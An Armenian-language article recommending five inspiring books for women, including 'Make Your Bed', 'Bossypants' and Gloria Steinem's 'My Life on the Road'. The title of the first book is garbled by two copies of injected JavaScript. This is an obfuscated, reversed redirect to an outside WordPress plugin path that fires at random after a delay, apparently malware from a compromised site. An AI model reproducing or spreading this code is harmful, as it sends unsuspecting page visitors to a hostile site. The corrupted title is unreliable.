
5 ոգեշնչող գրքեր, որոնք բոլոր կանայք պետք է կարդան
Միշտ չէ, որ ունենում ենք ժամանակ գրքեր կարդալու համար։ Սակայն կարանտինի շնորհիվ արդեն բոլորին հաջողվեց ծախսել այդ՝ երազանք դարձած ժամանակը գրքեր կարդալու վրա։ Այսպիով, ձեզ ենք ներկայացնում կանանց համար ոգեշնչող մի շարք գրքեր, որոնք կարող եք ավելացնել ընթերցանության ձեր ցանկում։
1. “You Are a Badass: How toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top Doubting Your Greatness and Start Living an Awesome Life”
Եկեք անկեղծ լինենք, երբեմն բոլորս էլ ունենք մեր հիասքանչության մասին բարձրաձայնելու կարիք։ Այս գիրքը կարող է ծառայել որպես «ուղեցույց» ձեր կյանքը ճիշտ տնօրինելու և ձեր լավագույն տեսակը դառնալու համար: Գրքում կգտնեք զվարճալի պատմություններ և կարևոր խորհուրդներ ձեր երազած կյանքը կառուցելու համար:
2. “Make Your Bed: Little Things That Can Change Your Life…And Maybe the World”
Այս գրքի հեղինակը կիսվում է կյանքի փոքրիկ, բայց էական բաներով, որոնք բոլորս պետք է իմանանք և առօրյայում կիրառենք: Մանրուքները մեծ դեր են խաղում յուրաքանչյուրիս կյանքում, սակայն շատ դեպքերում մարդիկ այն անտեսում են: Այս գիրքը հիանալի ընտրություն է բոլոր նրանց համար, ովքեր ցանկանում են մի փոքր կարգուկանոն մտցնել իրենց կյանքում:
3. “My Life on the Road”
Ֆեմինիստ Գլորիա Սթայնեմը կիսվում է 70-80-ական թվականներին իր կյանքի առջև ծառացած մարտահրավերներով՝ ուղղված կանանց իրավունքների պաշտպանությանը:
4. “Bossypants”
Թինա Փեյը կիսվում է իր կյանքի զվարճալի դրվագներով, որոնք ուղղորդել են նրան «կատակերգության թագուհի» դառնալու ճանապարհին: Գրքում կգտնեք դրվագներ իր կյանքի զվարճալի, հուզիչ, կրքոտ և երբեմն ամաչկոտ փորձերի մասին, որոնց միջով շատերս անցնում ենք, մինչև կգնենք մեր դերն այս աշխարհում:
5. “In the Company of Women: Inspiration and Advice from over 100 Makers, Artists, and Entrepreneurs”
Այս գիրքը հիմնականում կենտրոնացած է կանանց ձեռներեցության փորձի վրա՝ պատմելով տարբեր կարիերաներում ամբողջ աշխարհի տարբեր կանանց ավելի քան 100 փորձառությունների մասին:
Զբաղվելով բազմազան մասնագիտություններով ՝ դաջվածքի նկարիչներից մինչև ճարտարապետներ, ընթերցողը առաջին հերթին ձեռք է բերում գիտելիք այն մասին, թե ինչպիսին է աշխատանքային աշխարհը տարբեր տարիքի, ազգի և ծագմամբ կանանց համար: Այն կատարյալ ուղեցույց է և՛ անձնական, և՛ մասնագիտական կյանքում առաջնորդ լինելու համար:
Աղբյուր՝ Womansday